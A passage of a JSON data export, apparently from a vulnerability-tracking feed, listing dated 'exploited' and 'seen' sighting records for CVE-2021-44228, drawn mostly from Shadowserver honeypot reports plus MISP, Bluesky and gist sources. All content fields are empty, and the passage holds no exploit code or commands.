(honeypot/exploited-vulnerabilities) - (2024-11-12)", "content": "", "creation_timestamp": "2024-11-12T00:00:00.000000Z"}, {"uuid": "006566c6-eea9-49b7-ad75-727dcbaca91a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-14)", "content": "", "creation_timestamp": "2024-11-14T00:00:00.000000Z"}, {"uuid": "ef340c31-4d64-4919-9d5d-d2aabc0d9174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-08)", "content": "", "creation_timestamp": "2024-11-08T00:00:00.000000Z"}, {"uuid": "54ec269d-d9a3-4c5b-9bd7-e0dc81eb7583", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-25)", "content": "", "creation_timestamp": "2025-01-25T00:00:00.000000Z"}, {"uuid": "fb200898-cd6a-4547-9e79-79fdab1fbb41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "8b2b0d76-8622-4c09-8f97-dc0635493710", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-13)", "content": "", "creation_timestamp": "2024-11-13T00:00:00.000000Z"}, {"uuid": "029f82df-4277-4333-ada4-55b469970916", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-15)", "content": "", "creation_timestamp": "2024-11-15T00:00:00.000000Z"}, {"uuid": "22329d70-5938-4aff-8c78-2640837f9450", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lhbrshuucp2r", "content": "", "creation_timestamp": "2025-02-03T14:45:18.586028Z"}, {"uuid": "7c20e9f6-9ad7-4650-9502-a1da616cc238", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lhbrshxcgp2r", "content": "", "creation_timestamp": "2025-02-03T14:45:19.044105Z"}, {"uuid": "c10f6804-ef21-45c7-82f5-7439a73a0f8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-16)", "content": "", "creation_timestamp": "2024-11-16T00:00:00.000000Z"}, {"uuid": "9b4f63ad-5377-4228-810a-e865c699a6fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-17)", "content": "", "creation_timestamp": "2024-11-17T00:00:00.000000Z"}, {"uuid": "613f0656-2b5c-4d58-9ae3-1d6e03f8ecb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-21)", "content": "", "creation_timestamp": "2024-11-21T00:00:00.000000Z"}, {"uuid": "340d99a0-051e-4d14-b278-84145ab2712e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-23)", "content": "", "creation_timestamp": "2024-11-23T00:00:00.000000Z"}, {"uuid": "064ee9f2-50c3-4647-902e-ed13ea95a0d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-19)", "content": "", "creation_timestamp": "2024-11-19T00:00:00.000000Z"}, {"uuid": "08c9f8ac-a7af-4c93-9491-c40c43ab686c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-20)", "content": "", "creation_timestamp": "2024-11-20T00:00:00.000000Z"}, {"uuid": "c72230df-3610-40dc-907e-f59bab1c67c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-26)", "content": "", "creation_timestamp": "2024-11-26T00:00:00.000000Z"}, {"uuid": "df846989-f20e-4e9c-8ecf-47d3679cb0ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-22)", "content": "", "creation_timestamp": "2024-11-22T00:00:00.000000Z"}, {"uuid": "cca8bfd2-d926-4b37-b4ec-f4b099f71594", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-28)", "content": "", "creation_timestamp": "2024-11-28T00:00:00.000000Z"}, {"uuid": "30f0bf58-3b92-4a85-a63d-54f105ea00c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-24)", "content": "", "creation_timestamp": "2024-11-24T00:00:00.000000Z"}, {"uuid": "b2506060-5cd9-423b-b1a0-8e109772de7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-09)", "content": "", "creation_timestamp": "2024-12-09T00:00:00.000000Z"}, {"uuid": "67d52da0-9bb1-464c-ae46-1f91ac38c040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-25)", "content": "", "creation_timestamp": "2024-11-25T00:00:00.000000Z"}, {"uuid": "e34398c1-c17a-4c59-a87d-1b663bbf7c66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://threatintel.cc/2025/02/03/cves-exploited-in-reflecting-a.html", "content": "", "creation_timestamp": "2025-02-03T20:05:38.000000Z"}, {"uuid": "d762c84f-91e9-41d5-8f7d-47eb23e0b9ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-05)", "content": "", "creation_timestamp": "2024-12-05T00:00:00.000000Z"}, {"uuid": "b9947a83-5114-493d-8b3f-f4fd11323857", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-03)", "content": "", "creation_timestamp": "2024-12-03T00:00:00.000000Z"}, {"uuid": "21621ac2-05ae-4334-939f-7556c73ffee3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-04)", "content": "", "creation_timestamp": "2024-12-04T00:00:00.000000Z"}, {"uuid": "ede47457-714b-4723-b374-e8a9f09159ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-13)", "content": "", "creation_timestamp": "2024-12-13T00:00:00.000000Z"}, {"uuid": "78e450ff-bcea-4195-b562-00ce2a5ce71a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-15)", "content": "", "creation_timestamp": "2024-12-15T00:00:00.000000Z"}, {"uuid": "2047c758-3c0a-4868-a877-8f767e11c5c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-10)", "content": "", "creation_timestamp": "2024-12-10T00:00:00.000000Z"}, {"uuid": "d92eab82-b5f2-413d-b1d2-fc439cb70a93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-06)", "content": "", "creation_timestamp": "2024-12-06T00:00:00.000000Z"}, {"uuid": "4857b9f4-c84f-4a8d-94fe-0d67896113de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-08)", "content": "", "creation_timestamp": "2024-12-08T00:00:00.000000Z"}, {"uuid": "d9f8d558-27a6-48bd-bf48-f5f31a7fa9d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-07)", "content": "", "creation_timestamp": "2024-12-07T00:00:00.000000Z"}, {"uuid": "7f034baf-dfb0-4b4a-8380-1a2476a0adbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-06)", "content": "", "creation_timestamp": "2025-02-06T00:00:00.000000Z"}, {"uuid": "b173b718-ab03-4460-a5b3-06b6c6301913", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-11)", "content": "", "creation_timestamp": "2024-12-11T00:00:00.000000Z"}, {"uuid": "c890fd8a-1f51-491c-9523-18217b2fdfd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-14)", "content": "", "creation_timestamp": "2024-12-14T00:00:00.000000Z"}, {"uuid": "cc1811dd-7e54-4209-82e2-bf59654ce19a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-30)", "content": "", "creation_timestamp": "2025-03-30T00:00:00.000000Z"}, {"uuid": "11a47361-38c5-478a-8df1-b9049e58fa19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-18)", "content": "", "creation_timestamp": "2024-12-18T00:00:00.000000Z"}, {"uuid": "c15682c6-58ab-4fd9-9fe7-11c6bd6c6d4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-21)", "content": "", "creation_timestamp": "2024-12-21T00:00:00.000000Z"}, {"uuid": "5e6b23e7-a0ba-4024-847a-8a692d71d668", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-19)", "content": "", "creation_timestamp": "2024-12-19T00:00:00.000000Z"}, {"uuid": "e53be72c-28a4-48a8-9877-8684d8fd7f2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-26)", "content": "", "creation_timestamp": "2025-01-26T00:00:00.000000Z"}, {"uuid": "4d778ba0-0b59-439e-908e-17d9d535afdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "cbcc4437-c71c-44b6-901d-c5d349f6de8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "4abd8ea7-c0b0-4b7d-ab95-cdd5045d6c4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-44228", "type": "seen", "source": "https://bsky.app/profile/kotapub.bsky.social/post/3lgsuuopcpg22", "content": "", "creation_timestamp": "2025-01-28T16:30:17.927390Z"}, {"uuid": "fb0d90a0-b973-4f77-a85a-de9c3d5a3136", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "d27c2838-b3ab-4b85-aaf5-0193ca2720bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-03)", "content": "", "creation_timestamp": "2025-02-03T00:00:00.000000Z"}, {"uuid": "a3514e7e-60d6-41d0-b79a-e04119c6b82d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "1664679c-88f3-4e5c-9905-d15eedea34d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-05)", "content": "", "creation_timestamp": "2025-03-05T00:00:00.000000Z"}, {"uuid": "b5697d8a-a2af-4c4c-92b7-0999487c63f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-07)", "content": "", "creation_timestamp": "2025-02-07T00:00:00.000000Z"}, {"uuid": "6780bdfe-8061-48da-a5f8-eff6db827610", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-23)", "content": "", "creation_timestamp": "2025-03-23T00:00:00.000000Z"}, {"uuid": "0c172a3b-91c1-4223-9047-0d32e832ba9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-08)", "content": "", "creation_timestamp": "2025-03-08T00:00:00.000000Z"}, {"uuid": "5f9d696d-5c0c-490b-a693-33bdbb2ae4df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-09)", "content": "", "creation_timestamp": "2025-02-09T00:00:00.000000Z"}, {"uuid": "ce4572ba-20d8-4bc7-b81c-796348e034e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-09)", "content": "", "creation_timestamp": "2025-02-09T00:00:00.000000Z"}, {"uuid": "1bbbc14e-f498-4033-9653-9f4e4d062620", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-08)", "content": "", "creation_timestamp": "2025-02-08T00:00:00.000000Z"}, {"uuid": "f16e1697-8064-4b68-99cc-3a72281b442f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-10)", "content": "", "creation_timestamp": "2025-02-10T00:00:00.000000Z"}, {"uuid": "ddac68c5-ab2e-42e2-a9d9-d65247759ec3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "9ed5ce16-fe00-4b01-b0b3-d3161801566a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-03)", "content": "", "creation_timestamp": "2025-03-03T00:00:00.000000Z"}, {"uuid": "afed0653-4a99-42d1-b443-691d6e7bc91a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-27)", "content": "", "creation_timestamp": "2025-02-27T00:00:00.000000Z"}, {"uuid": "7f07271d-374a-4f66-b08f-c55655e7e5fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-10)", "content": "", "creation_timestamp": "2025-02-10T00:00:00.000000Z"}, {"uuid": "86e0a229-00bb-44fe-bb1a-d9a9658049d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:41.000000Z"}, {"uuid": "b611d48e-8109-412b-8a0e-063eeaedbfcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-04)", "content": "", "creation_timestamp": "2025-03-04T00:00:00.000000Z"}, {"uuid": "95577f89-e67c-4727-8c0c-fce6c8c41689", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-11)", "content": "", "creation_timestamp": "2025-02-11T00:00:00.000000Z"}, {"uuid": "2fd242ad-5586-4172-b529-c02e9d5786a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-25)", "content": "", "creation_timestamp": "2025-03-25T00:00:00.000000Z"}, {"uuid": "45024c4a-f0fc-4ee1-a407-d61768eac6df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-18)", "content": "", "creation_timestamp": "2025-03-18T00:00:00.000000Z"}, {"uuid": "19e7f901-7c9b-4064-8747-30dbac789513", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-22)", "content": "", "creation_timestamp": "2025-02-22T00:00:00.000000Z"}, {"uuid": "be2373d8-fa2b-40c2-9095-a932543ded98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-44228", "type": "seen", "source": "https://gist.github.com/machmandp/c037f6991a4ad4ab3665b9ff77a7a071", "content": "", "creation_timestamp": "2025-03-01T00:25:55.000000Z"}, {"uuid": "4cf79c9a-6bf9-4eee-ad0d-6756161b7113", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-18)", "content": "", "creation_timestamp": "2025-03-18T00:00:00.000000Z"}, {"uuid": "b396f779-1763-4d2a-961e-8f436643e274", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-26)", "content": "", "creation_timestamp": "2025-03-26T00:00:00.000000Z"}, {"uuid": "5ad4ea29-bc7c-4e5d-9e3a-f7abb8b5ae56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-12)", "content": "", "creation_timestamp": "2025-02-12T00:00:00.000000Z"}, {"uuid": "0d4bbfae-1fde-47a8-8526-44761c83e6ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-12)", "content": "", "creation_timestamp": "2025-02-12T00:00:00.000000Z"}, {"uuid": "bec9993d-25e3-4396-93a2-7c8dc239a545", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/IACTU/f27c1d0b62dd36b804149bc43c2030c4", "content": "", "creation_timestamp": "2025-03-01T21:13:20.000000Z"}, {"uuid": "97b470e0-3195-4d22-9ac4-eb5c142ef7d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-44228", "type": "seen", "source": "https://gist.github.com/zerwes/7af6800d6cad5660138d8682c0c7f284", "content": "", "creation_timestamp": "2025-03-05T12:50:30.000000Z"}, {"uuid": "42de8915-1fc8-492f-ac05-578cd93e625b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-22)", "content": "", "creation_timestamp": "2025-02-22T00:00:00.000000Z"}, {"uuid": "9231d96b-52fa-426c-9c75-9cc2b6fdde74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-24)", "content": "", "creation_timestamp": "2025-02-24T00:00:00.000000Z"}, {"uuid": "c2703405-76f3-4682-839a-80cb22086693", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-24)", "content": "", "creation_timestamp": "2025-02-24T00:00:00.000000Z"}, {"uuid": "a6a785de-daa7-42e2-b424-faf34cfcf310", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-14)", "content": "", "creation_timestamp": "2025-02-14T00:00:00.000000Z"}, {"uuid": "8812c83f-4b80-4220-bd10-6eda57cb9a50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 